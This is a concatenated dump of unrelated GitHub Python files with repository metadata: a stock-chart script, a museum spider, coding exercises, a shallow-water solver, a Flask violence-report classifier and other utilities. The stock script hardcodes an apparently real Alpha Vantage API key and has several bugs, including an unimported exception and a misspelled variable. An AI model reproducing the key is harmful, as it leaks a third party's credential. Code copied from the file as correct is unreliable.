views.ProductCategoryCreateView.as_view(), name='create_category'),\n path('categories/delete/', views.ProductCategoryDeleteView.as_view(), name='delete_category'),\n path('attributes/', views.ProductAttributeListView.as_view(), name='attribute_list'),\n path('attributes/create', views.ProductAttributeCreateView.as_view(), name='create_attribute'),\n path('attributes/delete/', views.ProductAttributeDeleteView.as_view(), name='delete_attribute'),\n\n]\n","repo_name":"Sblvsk/Hard_Code","sub_path":"core/mainapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29343551473","text":"from alpha_vantage.timeseries import TimeSeries\nimport requests\nimport pygal\nimport lxml\n \ndef do_another_stock():\n do_another_stock=True\n while(do_another_stock):\n another_stock = input(\"Would you like to analyze another stock?(y/n): \")\n if(another_stock==\"y\"):\n do_another_stock=main()\n if(another_stock!=\"y\"):\n do_another_stock=False\n\ndef main():\n while True:\n try:\n print(\"Stock Data Visualizer\")\n print(\"----------------------\")\n print(\" \")\n stock_symbol = input(\"Enter stock symbol: \")\n print(\" \")\n print(\"Chart Types\")\n print(\"-------------\")\n print(\"1: Line\")\n print(\"2: Bar\")\n print(\" \")\n while(True):\n try:\n chart_type = int(input(\"Enter chart type (1, 2): \"))\n if(chart_type < 1 or chart_type > 2):\n print('please enter 1 or 2')\n continue\n except ValueError:\n print(\"Please enter only Numerical values\")\n else:\n break\n print(\" \")\n print(\"Select Time Series of the chart you want to Generate\")\n print(\"------------------------------------------------------\")\n print(\"1: Intraday\")\n print(\"2: Daily\")\n print(\"3: Weekly\")\n print(\"4: Monthly\")\n print(\" \")\n while(True):\n try:\n time_series = int(input(\"Enter time series function (1-4): \"))\n #checks if user input is between 1-4\n if (time_series >4 or time_series <1):\n print('Please enter a number 1-4')\n continue\n #exception handles error if user input is not an integer. \n except ValueError:\n print('Please enter only numerical values')\n else:\n break\n #reads user input and will adjust url. Also checks to see if user selects intraday.\n if time_series == 1:\n interval = input(\"Enter time interval (1min, 5min, 15min, 30min, or 60min): \")\n url = f\"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol={stock_symbol}&interval={interval}&apikey=Y7P82MTGYSOW6CEX\"\n elif time_series == 2:\n url = f\"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY_ADJUSTED&outputsize=full&symbol={stock_symbol}&apikey=Y7P82MTGYSOW6CEX\"\n elif time_series == 3:\n url = f\"https://www.alphavantage.co/query?function=TIME_SERIES_WEEKLY&symbol={stock_symbol}&apikey=Y7P82MTGYSOW6CEX\"\n elif time_series == 4:\n url = f\"https://www.alphavantage.co/query?function=TIME_SERIES_MONTHLY&symbol={stock_symbol}&apikey=Y7P82MTGYSOW6CEX\" \n \n while(True):\n start_date = input(\"Enter start date (YYYY-MM-DD): \")\n end_date = input(\"Enter end date (YYYY-MM-DD): \")\n #checks if end_date is less than start_date\n if end_date < start_date:\n print(\"end date cannot be before start date\")\n continue\n elif end_date > start_date:\n break \n \n try:\n #using requests, an HTTP GET request is sent to the url that the user picks by selecting a specific time series \n get_url = requests.get(url)\n #returns an HTTPError object if an error happens during the HTTP GET process\n get_url.raise_for_status()\n except HTTPError as e:\n print(f\"Error retrieving data: {e}\")\n \n\n #json is used to parse data from get_url that the user wants into the stock_data variable\n stock_data = get_url.json()\n #Checks the number of keys in the stock_data is less than 2. If there is, an error will happen.\n if len(stock_data.keys()) < 2:\n print(\"Invalid stock. Be sure to use all caps and correct stock symbol.\")\n continue\n \n #The data stored in time series api has the stock symbol listed as the second key\n #stock_key varibale converts the keys to a list and grabs the second key and is assigned to it\n stock_key = list(stock_data.keys())[1]\n\n data = stock_data[stock_key]\n\n data_dict = {}\n #if statement that adds intraday data\n if time_series == \"intraday\":\n for intraday_time, values in data.items():\n date = inraday_time[:10]\n if start_date <= date <= end_date:\n data_dict[intraday_time] = values\n #else statement that adds every other time_series function to the dictionary if used\n else:\n for date, values in data.items():\n if start_date <= date <= end_date:\n data_dict[date] = values\n \n #sorts data_dict items found based off user inputs into tuple lists\n #using sorted, the list returns in ascending order that is assigned to sorted_data which will be used to create the pygal graph\n sorted_data = sorted(data_dict.items())\n\n #determines chart type based on user input\n if chart_type == 1:\n chart = pygal.Line(x_label_rotation=30, show_minor_x_labels=True)\n elif chart_type == 2:\n chart = pygal.Bar(x_label_rotation=30, show_minor_x_labels=True)\n\n chart.title = f\"{stock_symbol} Stock: {start_date} to {end_date}\"\n chart.x_labels = [date for date, value in sorted_data]\n chart.add(\"Open\", [float(value[\"1. open\"]) for date, value in sorted_data])\n chart.add(\"High\", [float(value[\"2. high\"])for date, value in sorted_data])\n chart.add(\"Low\", [float(value[\"3. low\"]) for date, value in sorted_data])\n chart.add(\"Close\", [float(value[\"4. close\"]) for date, value in sorted_data])\n chart.render_in_browser()\n break\n except Exception as e:\n print(e)\n\n do_another_stock()\nmain()\n\n","repo_name":"zjcch7/API-project3","sub_path":"apiTest.py","file_name":"apiTest.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32881528238","text":"#lay\nfrom ..items import *\n\n\nclass Museum96(scrapy.Spider):\n name = \"Museum96\"\n allowed_domains = ['81-china.com']\n start_urls = ['http://www.81-china.com/gaikuang/show-55.html']\n\n custom_settings = {\n 'ITEM_PIPELINES': {\n 'mySpider.pipelines.MuseumPipeLine': 300,\n },\n 'DOWNLOADER_MIDDLEWARES': {\n 'mySpider.middlewares.DefaultMiddleware': 0,\n },\n }\n\n def parse(self, response, **kwargs):\n item = MuseumBasicInformationItem()\n item[\"museumID\"] = 96\n item[\"museumName\"] = \"南昌八一起义纪念馆\"\n item[\"address\"] = \"南昌市西湖区中山路380号\"\n # str(response.xpath(\n # \"/html/body/div[3]/div[2]/div/div[1]/div[7]/dl[1]/dd[3]/text()\").extract_first()).replace(\"\\n\", \"\")\n item[\"openingTime\"] = \"周二至周日,09:00-17:00\"\n # str(response.xpath(\n # \"/html/body/div[3]/div[2]/div/div[1]/div[7]/dl[2]/dd[3]/text()\").extract_first()).replace(\"\\n\", \"\")\n item[\"consultationTelephone\"] = \"(0791)86613806\"\n item[\"publicityVideoLink\"] = None\n item[\"longitude\"] = \"115.969301\"\n item[\"latitude\"] = \"28.561501\"\n item[\"introduction\"] = response.xpath(\n '/html/body/div[1]/div[5]/div[4]/div/p[3]/span/text()').extract()\n\n print(item)\n yield item\n","repo_name":"CS1803-SE/The-First-Subsystem","sub_path":"mySpider/spiders/Museum96.py","file_name":"Museum96.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73342156005","text":"\"\"\"\nDaily Coding Problem - 2018-11-05.\n\nRun-length encoding is a fast and simple method of encoding strings. The\nbasic idea is to represent repeated successive characters as a single\ncount and character. For example, the string \"AAAABBBCCDAA\" would be\nencoded as \"4A3B2C1D2A\".\n\nImplement run-length encoding and decoding. You can assume the string to\nbe encoded have no digits and consists solely of alphabetic characters.\nYou can assume the string to be decoded is valid.\n\"\"\"\n\n\ndef encode_str(some_str=''):\n \"\"\"Given a string, run-length encode it.\"\"\"\n if not some_str:\n return None\n result = ''\n arr = list(some_str)\n current_char = arr.pop()\n run = 1\n while arr:\n last_char = arr.pop()\n if current_char != last_char or not arr:\n if not arr and current_char == last_char:\n run += 1\n result = str(run) + current_char + result\n current_char = last_char\n run = 0\n run += 1\n return result\n\n\nprint(encode_str('AAAABBBCCDAA')) # 4A3B2C1D2A\nprint(encode_str('AABDDDDA')) # 2A1B4D1A\nprint(encode_str('')) # None\n","repo_name":"ericgarig/daily-coding-problem","sub_path":"029-run-length-strings.py","file_name":"029-run-length-strings.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27506792749","text":"class Solution(object):\r\n def productExceptSelf(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: List[int]\r\n \"\"\"\r\n mul, res, tag, n = 1, [], -1, len(nums)\r\n\r\n for i in range(n):\r\n if nums[i]:\r\n mul *= nums[i]\r\n elif tag == -1:\r\n tag = i\r\n else:\r\n return [0] * n\r\n\r\n if tag != -1:\r\n return [0] * tag + [mul] + [0] * (n - tag - 1)\r\n for each in nums:\r\n res.append(mul / each)\r\n return res\r\n\r\n# more pythonic\r\n def productExceptSelf(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: List[int]\r\n \"\"\"\r\n x=nums.count(0)\r\n ans=[0]*len(nums)\r\n if x>1:\r\n return ans\r\n if x==1:\r\n product=reduce(lambda x,y:x if y==0 else y if x==0 else x*y,nums)\r\n ans[nums.index(0)]=product\r\n return ans\r\n product=reduce(lambda x,y:x*y,nums)\r\n ans=[product/i for i in nums]\r\n return ans","repo_name":"agave233/leetcode","sub_path":"238-Product-of-Array-Except-Self/238.py","file_name":"238.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41922419182","text":"import whisper\nfrom datetime import timedelta\nfrom srt import Subtitle\nimport srt\nimport os\nimport time\nimport logging\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\ndef setup_logger():\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', '%Y-%m-%d %H:%M:%S')\n\n log_directory = os.getenv('LOG_DIRECTORY')\n if not os.path.exists(log_directory) :\n os.makedirs(log_directory)\n\n handler = logging.FileHandler(f'{log_directory}/whisper_log.txt', encoding='utf-8-sig')\n handler.setFormatter(formatter)\n\n logger = logging.getLogger()\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)\n\nsetup_logger()\n\ndef time_logging(func):\n def wrapper(*args,**kwargs):\n start_time = time.time()\n result = func(*args,**kwargs)\n elapsed_time = (time.time() - start_time)\n minutes,seconds = divmod(elapsed_time,60)\n elapsed_time = round(elapsed_time, 2) # Round to 2 decimal places\n\n if(result):\n if 1 < len(args):\n #logging.info(f\"{func.__name__} {args[1]} {elapsed_time} seconds.\")\n logging.info(f'{func.__name__:<20} {int(minutes):>2}m {seconds:>05.2f}s {args[1]}')\n else:\n logging.info(f\"{func.__name__} took {elapsed_time} seconds.\")\n return result\n return wrapper\n\ndef add_line(s):\n new_s = s\n s_count = len(s)\n s_max_count = 100 # 改行する文字列。基本しなくてもいい\n if s_count >= s_max_count:\n if (s_count - s_max_count) >= 3:\n # s_max_count 文字以上、かつ、2行目が3文字以上あれば、改行する\n new_s = s[:s_max_count] + \"\\n\" + s[s_max_count:]\n \n return new_s\n\n@time_logging\ndef output_whisper_result(file_path , filename , model):\n ## 音声へのパス\n input =file_path + '/' +filename + '.mp3'\n \n output = file_path + '/' + filename + '.txt'\n\n print('INPUT:'+input)\n print('OUTPUT:'+output)\n\n if not os.path.exists(output):\n\n ## 結果を出力と同時に取得\n result = model.transcribe(input, verbose=True, language='ja')\n\n segments = result['segments']\n subs = []\n for data in segments:\n index = data[\"id\"] + 1\n start = data[\"start\"]\n end = data[\"end\"]\n text = add_line(data[\"text\"])\n sub = Subtitle(index=1, start=timedelta(seconds=timedelta(seconds=start).seconds,\n microseconds=timedelta(seconds=start).microseconds),\n end=timedelta(seconds=timedelta(seconds=end).seconds,\n microseconds=timedelta(seconds=end).microseconds), content=text, proprietary='')\n \n subs.append(sub)\n\n with open(output, mode='w' ,encoding='utf-8') as file:\n # 文字列をファイルに書き込みます\n file.write(srt.compose(subs))\n\n return True\n\n return False\n\n\n#path = 'mp3'\n#filename = 'sample.mp3'\n# モデルの読み込みにもかなり時間が必要だったので、引数で渡す\n#model = whisper.load_model(\"medium\")\n#output_whisper_result(path,filename,model)\n\n","repo_name":"everystudio/youtube_embedding","sub_path":"whisper_convert.py","file_name":"whisper_convert.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1687734105","text":"frame_size = int(input())\n\n# build_frame = [[1, 0, 0, 1], [1, 1, 1, 1], [2, 1, 0, 1], [2, 2, 1, 1],\n# [5, 0, 0, 1], [5, 1, 0, 1], [4, 2, 1, 1], [3, 2, 1, 1]]\n\nbuild_frame = [[0, 0, 0, 1], [2, 0, 0, 1], [4, 0, 0, 1], [0, 1, 1, 1],\n [1, 1, 1, 1], [2, 1, 1, 1], [3, 1, 1, 1], [2, 0, 0, 0],\n [1, 1, 1, 0], [2, 2, 0, 1]]\n\n\n# check_frame() 메소드는 O(n)의 시간이 소요된다.\ndef check_frame(answer):\n\n for one in answer:\n\n if one[2] == 0:\n if one[1] == 0 or [one[0] - 1, one[1], 1] in answer or [one[0], one[1], 1] in answer or \\\n [one[0], one[1] - 1, 0] in answer:\n continue\n return False\n if one[2] == 1:\n if [one[0], one[1] - 1, 0] in answer or [one[0] + 1, one[1] - 1, 0] in answer or \\\n ([one[0] - 1, one[1], 1] in answer and [one[0] + 1, one[1], 1] in answer):\n continue\n return False\n\n return True\n\n\ndef solution():\n\n answer = []\n\n # O(len(build_frame))\n for one in build_frame:\n\n x, y, stuff, operator = one\n\n if operator == 0:\n\n answer.remove([x, y, stuff])\n if not check_frame(answer):\n answer.append([x, y, stuff])\n\n if operator == 1:\n answer.append([x, y, stuff])\n if not check_frame(answer):\n answer.remove([x, y, stuff])\n\n return sorted(answer)\n\n\nprint(solution())\n","repo_name":"junho-devv/algorithm-study","sub_path":"#BOOKㅣ이취코 with 파이썬/구현_ex006.py","file_name":"구현_ex006.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18583893274","text":"\"\"\"\n\nDemo program that solves the 1 layer shallow water equation in a doubly\nperiodic domain. The solution is initialized using a perturbed\nvortex and evolved in time with a 4'th order Runge Kutta method.\n\nPlease note that this is not an optimized solver. For fast solvers, see\nhttp://github.com/spectralDNS/spectralDNS\n\nFuture work:\n- implement a n layer solver based on spectraldns software architecture\n- use spectral space to compute derivates but time step in physical space\n\nTo run the code:\nmpirun -n 4 python -u sw1l.py\n\nhttps://mpi4py-fft.readthedocs.io/en/latest/io.html\n\"\"\"\nfrom time import time\nimport numpy as np\nfrom mpi4py import MPI\nfrom mpi4py_fft.mpifft import PFFT, Function\n\nimport matplotlib.pyplot as plt\n\n# Set viscosity, end time and time step\n#nu = 0.000625\nday2sec = 86400.\nT = 1. * day2sec\ndt = 1.e0\ng = 9.8\nplot = False\n\n# Set global size of the computational box\nM = 10\nN = [2**M, 2**M]\nLd = 100e3\nL = np.array([2*np.pi*Ld, 2*np.pi*Ld], dtype=float)\n# Needs to be (2*int)*pi in all directions (periodic) because of initialization\n\n# Create instance of PFFT to perform parallel FFT + an instance to do FFT with padding (3/2-rule)\nFFT = PFFT(MPI.COMM_WORLD, N, collapse=False)\n#FFT_pad = PFFT(MPI.COMM_WORLD, N, padding=[1.5, 1.5, 1.5])\nFFT_pad = FFT\n\n# Declare variables needed to solve Navier-Stokes\nU = Function(FFT, False, tensor=2) # Velocity\nU_hat = Function(FFT, tensor=2) # Velocity transformed\nH = Function(FFT, False) # Water height (scalar)\nH_hat = Function(FFT) # Water height transformed\n#\nU_hat0 = Function(FFT, tensor=2) # Runge-Kutta work array\nU_hat1 = Function(FFT, tensor=2) # Runge-Kutta work array\nH_hat0 = Function(FFT) # Runge-Kutta work array\nH_hat1 = Function(FFT) # Runge-Kutta work array\n\na = [1./6., 1./3., 1./3., 1./6.] # Runge-Kutta parameter\nb = [0.5, 0.5, 1.] # Runge-Kutta parameter\ndU = Function(FFT, tensor=2) # Right hand side of ODEs\ndH = Function(FFT) # Right hand side of ODEs\n\nmuH = Function(FFT, tensor=2)\n\n#curl = Function(FFT, False, tensor=2)\nU_pad = Function(FFT_pad, False, tensor=2)\nH_pad = Function(FFT_pad, False)\ncurl_pad = Function(FFT_pad, False)\nUH_pad = Function(FFT_pad, False, tensor=2)\n\ndef get_local_mesh(FFT, L):\n \"\"\"Returns local mesh.\"\"\"\n X = np.ogrid[FFT.local_slice(False)]\n N = FFT.shape()\n for i in range(len(N)):\n X[i] = (X[i]*L[i]/N[i])\n X = [np.broadcast_to(x, FFT.local_shape(False)) for x in X]\n return X\n\ndef get_local_wavenumbermesh(FFT, L):\n \"\"\"Returns local wavenumber mesh.\"\"\"\n\n s = FFT.local_slice()\n N = FFT.shape()\n\n # Set wavenumbers in grid\n k = [np.fft.fftfreq(n, 1./n).astype(int) for n in N[:-1]]\n k.append(np.fft.rfftfreq(N[-1], 1./N[-1]).astype(int))\n K = [ki[si] for ki, si in zip(k, s)]\n Ks = np.meshgrid(*K, indexing='ij', sparse=True)\n Lp = 2*np.pi/L\n for i in range(2):\n Ks[i] = (Ks[i]*Lp[i]).astype(float)\n return [np.broadcast_to(k, FFT.local_shape(True)) for k in Ks]\n\nX = get_local_mesh(FFT, L)\nK = get_local_wavenumbermesh(FFT, L)\nK = np.array(K).astype(float)\nK2 = np.sum(K*K, 0, dtype=float)\nK_over_K2 = K.astype(float) / np.where(K2 == 0, 1, K2).astype(float)\n\ndef cross(x, z):\n \"\"\"Cross product z = k \\times x\"\"\"\n z[0] = FFT_pad.forward(-x[1], z[0])\n z[1] = FFT_pad.forward(x[0], z[1])\n return z\n\ndef compute_curl(x, z):\n z = FFT_pad.backward(1j*(K[0]*x[1]-K[1]*x[0]), z)\n return z\n\ndef add_grad(x, z):\n z[0] += 1j*K[0]*x\n z[1] += 1j*K[1]*x\n return z\n\ndef compute_div(x, z):\n z = 1j*(K[0]*x[0]+K[1]*x[1])\n return z\n\ndef compute_rhs(rhsU, rhsH):\n H_pad[:] = FFT_pad.backward(H_hat, H_pad)\n for j in range(2):\n U_pad[j] = FFT_pad.backward(U_hat[j], U_pad[j])\n\n curl_pad[:] = compute_curl(U_hat, curl_pad)\n rhsU = cross(curl_pad, rhsU)\n rhsU = add_grad(-g*H_hat, rhsU)\n #rhsU -= nu*K2*U_hat\n\n for i in range(2):\n muH[i] = FFT_pad.forward(-U_pad[i]*H_pad, muH[i]) # vector, spectral space\n #UH_pad[0] = U_pad[0]*H_pad\n #UH_pad[1] = U_pad[1]*H_pad\n #muH[:] = FFT_pad.forward(-UH_pad, muH) # vector, spectral space\n # for some reason does not want to broadcast this\n #muH[:] = FFT_pad.forward(-U_pad*H_pad[np.newaxis,:,:], muH) # vector, spectral space\n rhsH = compute_div(muH, rhsH)\n\n return rhsU, rhsH\n\n# Initialize with a bump of sea level\nLv = 10e3\nev = 2.\nH[:] = 4000. + 1.*np.exp(-(X[0]-Ld/2.)**2/Lv**2 -(X[1]-Ld/2.)**2/(ev*Lv)**2)\nU[0] = 0\nU[1] = 0\n#\nH_hat = FFT.forward(H, H_hat)\nfor i in range(2):\n U_hat[i] = FFT.forward(U[i], U_hat[i])\n\n# Integrate using a 4th order Rung-Kutta method\nt = 0.0\ntstep = 0\nt0 = time()\nwhile t < T-1e-8:\n t += dt\n tstep += 1\n U_hat1[:] = U_hat0[:] = U_hat\n H_hat1[:] = H_hat0[:] = H_hat\n for rk in range(4):\n dU, dH = compute_rhs(dU, dH)\n if rk < 3:\n H_hat = H_hat0 + b[rk]*dt*dH\n U_hat[:] = U_hat0 + b[rk]*dt*dU\n H_hat1[:] += a[rk]*dt*dH\n U_hat1[:] += a[rk]*dt*dU\n H_hat[:] = H_hat1[:]\n U_hat[:] = U_hat1[:]\n\n H = FFT.backward(H_hat, H)\n for i in range(2):\n U[i] = FFT.backward(U_hat[i], U[i])\n k = MPI.COMM_WORLD.reduce(np.sum(U[0]*U[0])/N[0]/N[1]/2)\n if MPI.COMM_WORLD.Get_rank() == 0:\n print(\"Energy = {}\".format(k))\n print(\"t = {}\".format(t))\n if plot and np.mod(tstep,100)==0:\n plt.figure()\n plt.imshow(H-4000.)\n plt.colorbar()\n plt.show()\n\n## Transform result to real physical space\n#for i in range(3):\n #U[i] = FFT.backward(U_hat[i], U[i])\n\n# Check energy\n#k = MPI.COMM_WORLD.reduce(np.sum(U*U)/N[0]/N[1]/N[2]/2)\n#if MPI.COMM_WORLD.Get_rank() == 0:\n# print('Time = {}'.format(time()-t0))\n# assert round(float(k) - 0.124953117517, 7) == 0\n","repo_name":"apatlpo/shallow_equinox","sub_path":"swpy/sandbox/sw1l.py","file_name":"sw1l.py","file_ext":"py","file_size_in_byte":5873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"34700893780","text":"# web: gunicorn app:app\nimport datetime\nfrom flask import Flask, jsonify, request, render_template\nfrom flask_cors import CORS\nfrom helper.VR_Classifier import VR_Classifier\nfrom helper.encoder import JSONEncoder\nfrom flask_pymongo import PyMongo\n\napp = Flask(__name__, template_folder='site')\napp.config['JSONIFY_PRETTYPRINT_REGULAR'] = True\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/report_db\"\nmongodb_client = PyMongo(app)\ndb = mongodb_client.db\nCORS(app)\n\n# ==============================================================\n# Route of Projects\n# ==============================================================\n\n@app.route('/', methods=['GET','POST'])\ndef vra():\n if request.method == 'GET':\n reports = db.todos.find()\n return render_template('index.html', reports=reports)\n if request.method == 'POST':\n datelog = str(datetime.datetime.now())\n nik = request.form['nik']\n abuse_type = request.form['abuse_type']\n relation = request.form['relation']\n victim_age = request.form['victim_age']\n agressor_age = request.form['agressor_age']\n prev_abuse_report = request.form['prev_abuse_report']\n living_together = request.form['living_together']\n short_chronology = request.form['short_chronology']\n\n classifier = VR_Classifier()\n encoded_report = classifier.encode([(relation, victim_age, agressor_age, prev_abuse_report, living_together)])\n scaled_report = classifier.scale(encoded_report)\n risk_level = classifier.predict(scaled_report)\n\n db.todos.insert_one({\n 'date_log': datelog,\n 'nik' : nik,\n 'violence_type': abuse_type,\n 'relation': relation,\n 'victim_age': victim_age,\n 'agressor_age': agressor_age,\n 'prev_abuse_report': prev_abuse_report,\n 'living_together': living_together,\n 'short_chronology': short_chronology,\n 'risk_level': risk_level\n })\n\n reported = [datelog, nik, abuse_type, relation, victim_age, agressor_age, prev_abuse_report, living_together, short_chronology, risk_level]\n\n return render_template('index.html', _anchor='#report', result=reported)\n\nif __name__ == '__main__':\n app.run()","repo_name":"hanifabd/vra-arjuna","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1495764940","text":"\"\"\" DHMINTOOLS: utility functions specifically for DHMIN models\n\nThis package contains helper functions for pre- and postprocessing data for and\nfrom a DHMIN model that will help to shorten script files (like rundh.py) and \nare to be used among scenarios.\n\n\"\"\"\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport dhmin\n\ndef plot_flows_min(model):\n \"\"\" Plot power flows for minimal example.\n \n Creates a minimal visualisation of the `mnl.xlsx` model provided with\n DHMIN.\n \"\"\"\n \n power_flows = dhmin.get_entities(model, ['Pin', 'Pot'])\n power_flows_grouped = power_flows.groupby(level='timesteps')\n \n power_input = dhmin.get_entity(model, 'Q')\n power_input_grouped = power_input.groupby(level='timesteps')\n \n plt.figure()\n for i, (name, group) in enumerate(power_flows_grouped):\n plt.subplot(2,3,i+1)\n plt.title(name)\n plt.xlim(0, 10)\n plt.ylim(0, 10)\n for key, value in group['Pin'].iteritems():\n x = [int(key[0]/10), int(key[1]/10)]\n y = [key[0]%10, key[1]%10]\n z = 2 if value > 1 else 1 # show grey lines behind red ones\n w = max(0.5, value/80)\n colour = '#ff5500' if value > 1 else '#cccccc'\n plt.plot(x, y, linewidth=w, color=colour, zorder=z, solid_capstyle='round') \n #group['Pin'].plot()\n \n Q = power_input_grouped.get_group(name)['Q']\n for key, value in Q.iteritems():\n x = int(key[0]/10)\n y = key[0]%10\n z = 3\n w = max(0, value/4)\n colour = '#990000' if value > 1 else '#ffffff'\n plt.scatter(x, y, zorder=z, s=w, facecolors=colour, edgecolors='none', linewidths=0)\n plt.show()\n \n \ndef symmetrize(df):\n \"\"\" Make a directed quantity (like y, Pin, Pot) symmetric (like Pmax or x).\n \n Args:\n df: a dataframe with 2-element tuple index of (i,j) node pairs\n \n Returns:\n Symmetrized dataframe, where each element (i,j) is calculated as the \n sum df(i,j) + df(j,i), assuming 0 for non-existing values.\n \n Example\n \n \"\"\"\n df_tmp = pd.DataFrame(df)\n original_index_levels = df_tmp.index.names\n df_tmp.index.names = original_index_levels[::-1] # swap levels \n df_tmp = df_tmp.reorder_levels(original_index_levels)\n df.index.names = original_index_levels # restore original index (!)\n df_symmetric = df.add(df_tmp, fill_value=0)\n return df_symmetric\n\n","repo_name":"tum-ens/dhmin","sub_path":"dhmintools.py","file_name":"dhmintools.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"37338242322","text":"import gettext\nimport threading\nimport numpy as np\n\nimport time\nimport logging\n\n# Non-standard packages\nfrom nionswift_plugin.nionswift_structure_recognition.model import load_preset_model\nfrom nionswift_plugin.nionswift_structure_recognition.scale import RealSpaceCalibrator\n\n# Custom libraries\nfrom . import lib_utils\nfrom . import lib_structure_recognition\nfrom .lib_utils import AtomManipulatorModule\nfrom .lib_widgets import Section, line_edit_template, check_box_template, combo_box_template, push_button_template\n\n_ = gettext.gettext\n\n# Defaults on initialization.\ndefaults = {'visualize_atoms': True,\n 'auto_detect_foreign_atoms': True,\n 'element_identification_integration_radius_A': 0.25, # in Angstroem\n 'element_identification_exponent': 1.64,\n 'image_source': 0, # 0: MAADF, 1: HAADF, 2: Selected data item\n 'scale_calibration_mode': 1 # 0: Manual, 1: Live\n }\n\n\nclass StructureRecognitionModule(AtomManipulatorModule):\n\n def __init__(self, ui, api, document_controller, manipulator):\n super().__init__(ui, api, document_controller)\n self.manipulator = manipulator # AtomManipulatorDelegate object\n self.auto_detect_foreign_atoms = None\n self.element_id_int_radius = None\n self.element_id_exponent = None\n self.nn_output = None\n self.scale_calibration_mode = None\n self.sampling = None\n self.fov = None\n self.visualize_atoms = None\n self.live_analysis = None\n self.was_playing = None\n\n self.model = load_preset_model('graphene')\n\n # Events.\n self.stop_live_analysis_event = threading.Event()\n self.rdy = threading.Event()\n self.new_image = threading.Event()\n \n # GUI creation method.\n def create_widgets(self, column):\n section1 = Section(self.ui, 'Scale calibration') # Scale calibration recognition section.\n section2 = Section(self.ui, 'Structure recognition') # Structure recognition section.\n column.add(section1)\n column.add(section2)\n \n # Callback functions.\n def scale_calibration_mode_changed(item):\n # Sanitization of input.\n if type(item) == int:\n item = self.scale_calibration_combo_box.items[item]\n # Ensure combo box displays the correct mode.\n self.scale_calibration_combo_box.current_item = item\n\n # Remove widgets if they are in the container.\n try:\n scale_calibration_button_container._widget.remove_all()\n except:\n pass\n\n # Build widget container.\n if self.scale_calibration_combo_box.current_index == 0: # Single data item for RealSpaceCalibrator.\n self.scale_calibration_mode = 0\n dummy_row, self.scale_calibration_button = push_button_template(self.ui, 'Run with selected data item')\n self.scale_calibration_button.on_clicked = scale_calibration_button_clicked\n scale_calibration_button_container.add(self.scale_calibration_button)\n elif self.scale_calibration_combo_box.current_index == 1: # Live calibration with FourierScaleCalibrator.\n self.scale_calibration_mode = 1\n self.sampling = None\n self.fov = None\n lib_utils.refresh_GUI(self.manipulator, ['sampling'])\n\n def scale_calibration_button_clicked():\n # Calculate target values that directly follow from Nion Swift Scan settings.\n tdi = self.manipulator.document_controller.target_data_item\n fov_1d_target_value_nm = tdi.metadata['scan']['fov_nm']\n sampling_target_value = fov_1d_target_value_nm*10/np.sqrt(tdi.data.size)\n min_sampling = sampling_target_value*.75\n max_sampling = sampling_target_value*1.25\n step_size=(max_sampling-min_sampling)/5\n \n calibrator = RealSpaceCalibrator(model=self.model,\n template='hexagonal',\n lattice_constant=2.46, # Graphene (in Angstroem)\n min_sampling=min_sampling,\n max_sampling=max_sampling,\n step_size=step_size\n )\n \n def do_this():\n t = time.time()\n logging.info(lib_utils.log_message(\"Calling RealSpaceCalibrator\"))\n self.sampling = calibrator(tdi.data)\n t = time.time()-t\n logging.info(lib_utils.log_message(f\"RealSpaceCalibrator finished after {t:.5f} seconds\"))\n \n self.fov = [self.sampling*s for s in tdi.data.shape]\n lib_utils.refresh_GUI(self.manipulator, ['sampling'])\n \n # Run in other thread.\n self.manipulator.t6 = threading.Thread(target = do_this, name = 'RealSpaceCalibrator')\n self.manipulator.t6.start()\n\n def image_source_changed(item):\n if type(item) == int:\n item = self.image_source_combo_box.items[item]\n self.image_source_combo_box.current_item = item\n \n # Keep track of whether live analysis is checked when switching between MAADF and HAADF.\n try:\n saved_var = self.live_analysis_check_box.checked\n except:\n saved_var = False \n live_analysis_row._widget.remove_all()\n\n if self.image_source_combo_box.current_index in [0, 1]:\n self.live_analysis_check_box = self.ui.create_check_box_widget('Live analysis')\n live_analysis_row.add(self.live_analysis_check_box)\n self.live_analysis_check_box.on_checked_changed = live_analysis_changed\n self.live_analysis_check_box.checked = saved_var\n live_analysis_changed(saved_var) # Calling this ensures that the push button goes into the correct state.\n\n def visualize_atoms_changed(checked):\n self.visualize_atoms = checked\n\n def auto_detect_foreign_atoms_changed(checked):\n self.auto_detect_foreign_atoms = checked\n\n def element_id_int_radius_changed(text):\n if len(text) > 0:\n try:\n self.element_id_int_radius = float(text)\n except:\n pass\n finally:\n self.element_id_int_radius_line_edit.text = f\"{self.element_id_int_radius:.2f}\"\n\n def element_id_exponent_changed(text):\n if len(text) > 0:\n try:\n self.element_id_exponent = float(text)\n except: pass\n finally: 